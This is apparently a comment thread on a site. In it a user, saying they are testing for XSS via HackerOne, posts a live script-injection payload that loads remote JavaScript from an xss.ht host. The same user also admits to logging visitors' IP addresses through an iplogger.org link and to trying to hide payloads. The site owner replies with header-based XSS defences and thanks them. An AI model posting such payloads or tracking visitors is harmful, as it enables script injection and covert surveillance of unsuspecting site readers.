Testtest for xss from hackerone

testing from hackerone

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javascript:eval(‘var a=document.createElement('script');a.src='https://a5h.xss.ht';document.body.appendChild(a)’)

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Nice; did you find any vulnerabilities?

still no but i can get ip who visit my page are you from status.im?

Yeah, I’m tidus.eth on Status. :slight_smile:

got it nice to meet you

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Likewise! Haha I see you trying to fetch https://iplogger.org/1bzX47 :smiley:

yes iam checking i can hide any payload to do something

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I generally block XSS by injecting headers through my Web server across everything I host (Caddy makes this super easy), then relaxing them per subdomain as needed or if I see errors in the console for whatever.

cool okay i will try other vulnerability test

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Best of luck! Thanks for the white hat work. :slight_smile:

thanks for chat chris i try my best


welcome :)))))))))))))